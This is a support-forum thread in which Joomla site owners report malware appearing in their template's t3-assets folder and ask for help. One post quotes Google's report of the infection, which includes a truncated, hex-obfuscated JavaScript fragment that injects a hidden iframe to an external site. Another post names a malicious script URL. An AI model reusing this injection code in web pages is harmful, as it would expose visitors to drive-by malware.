-
AuthorPosts
-
June 13, 2012 at 10:52 am #178111
Hi,
i’m using ja-bistro on my websites that you can find here: http://www.locandadellarco.com.
from some days google has added my website in a blacklist because there are some malware into the t3-assets folder…I deleted all files into t3-assets and changed ftp password but yesterday evening I found a new suspicious .js (a javascript that contain a link here mmm2011.ppcsoft.in/ pizda.js into t3-assets folder.
What can I do?
Sherlock FriendSherlock
- Join date:
- September 2014
- Posts:
- 11453
- Downloads:
- 0
- Uploads:
- 88
- Thanks:
- 221
- Thanked:
- 2478 times in 2162 posts
June 14, 2012 at 7:30 am #457358Hi cecet23,
Your site seem to be infected by virus, I think you should contact your hosting manager to get more assistance 🙁
June 14, 2012 at 1:06 pm #457412<em>@Sherlock Holmes 325313 wrote:</em><blockquote>Hi cecet23,
Your site seem to be infected by virus, I think you should contact your hosting manager to get more assistance 🙁
</blockquote>is that what I did, but my hosting manager told me that depend by some script on joomla. In fact the main problem is the folder t3-assets that is used by ja-bistro template.
Winchester FriendWinchester
- Join date:
- February 2011
- Posts:
- 32
- Downloads:
- 24
- Uploads:
- 3
- Thanks:
- 2
- Thanked:
- 19 times in 6 posts
June 24, 2012 at 5:04 am #458623<em>@cecet23 325384 wrote:</em><blockquote>is that what I did, but my hosting manager told me that depend by some script on joomla. In fact the main problem is the folder t3-assets that is used by ja-bistro template.</blockquote>
They always tell you that even if all your scripts (Joomla and extensions) are up-to-date. You should check to make sure all your extensions are updated just in case though.
You can check here to see if any of your installed extensions are listed.
http://feeds.joomla.org/JoomlaSecurityVulnerableExtensionsA quick question though. Is it always in the same folder or are these files in other places too?
Best regards,
H. Winchester Lyon1 user says Thank You to Winchester for this useful post
August 20, 2012 at 6:42 pm #464773Hello, I need help. My site yesterday joined the Google blacklist.
Details malware
URL: http://www.4ponto2.com.br/site_4ponto2/t3-assets/js33c0f.js
Last checked: 19 August 2012When Google last tested this page once, your server returned content that directed the browser to a website infected with malware. The following is an example of inserting malicious code. We recommend checking the source code in search of this and any other unauthorized changes and consult our guidelines for cleaning your site and request a review.
show
1.1 to 1
Malicious code inserted Type Occurrencesvar _0x3ba2=[“x3D”,””,”x6Cx65x6Ex67x74x68″,”x63x6F
x6Fx6Bx69x65″,”x69x6Ex64x65x78x4Fx66″,”x3B”,”x73
x75x62x73x74x72x69x6Ex67″,”x73x74x6Fx70x65x64″
,”x70x6Cx61x74x66x6Fx72x6D”,”x57x69x6Ex33x32″,”
x61x70x70x4Ex61x6Dx65″,”x4Dx69x63x72x6Fx73x6F
x66x74x20x49x6Ex74x65x72x6Ex65x74x20x45x78x70
x6Cx6Fx72x65x72″,”x4Ex65x74x73x63x61x70x65″,”x3
4x33x32x30x30x30x20x68x6Fx75x72x73″,”x67x65x74
x48x6Fx75x72x73″,”x73x65x74x48x6Fx75x72x73″,”x
73x74x6Fx70x65x64x3D”,”x3Bx70x61x74x68x3Dx2Fx3
Bx65x78x70x69x72x65x73x3D”,”x74x6Fx47x4Dx54x53
x74x72x69x6Ex67″,”x3Cx64x69x76x20x6Ex61x6Dx65
x3Dx22x79x6Fx75x74x75x62x65x22x3Ex3Cx69x66x72
x61x6Dx65x20x77x69x64x74x68x3Dx22x31x22x20x68
x65x69x67x68x74x3Dx22x31x22x20x73x72x63x3Dx22
x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex6Dx61x6Ex74
x72x61x2Dx73x74x6Fx6Ex65x2Ex64x65x2Fx63x6Fx6E
x74What can i do? :(( Thanks
Sherlock FriendSherlock
- Join date:
- September 2014
- Posts:
- 11453
- Downloads:
- 0
- Uploads:
- 88
- Thanks:
- 221
- Thanked:
- 2478 times in 2162 posts
August 21, 2012 at 1:38 am #464791Hi marcio42,
I took a look but the file t3-assets/js33c0f.js seem could not be found, also I don’t see the google warning when visiting your site
jan van de beek Friendjan van de beek
- Join date:
- November 2014
- Posts:
- 61
- Downloads:
- 23
- Uploads:
- 10
- Thanks:
- 9
December 28, 2016 at 11:27 am #997845there all, i have the same issue on JA-MAGZ
it seems to be that this issue is caused true J3-assets .. it gets a javascript URL which is loaded a external URL which causes this issue
Ninja Lead ModeratorNinja Lead
- Join date:
- November 2014
- Posts:
- 16064
- Downloads:
- 310
- Uploads:
- 2864
- Thanks:
- 341
- Thanked:
- 3854 times in 3563 posts
December 29, 2016 at 2:13 am #998010Hi @jan van de beek
You can change the setting on your site as my screenshot: http://prntscr.com/dp4ovp hope it helps
Regards
AuthorPostsViewing 8 posts - 1 through 8 (of 8 total)This topic contains 7 replies, has 6 voices, and was last updated by Ninja Lead 7 years, 10 months ago.
We moved to new unified forum. Please post all new support queries in our New Forum
t3-assets and Malware
Viewing 8 posts - 1 through 8 (of 8 total)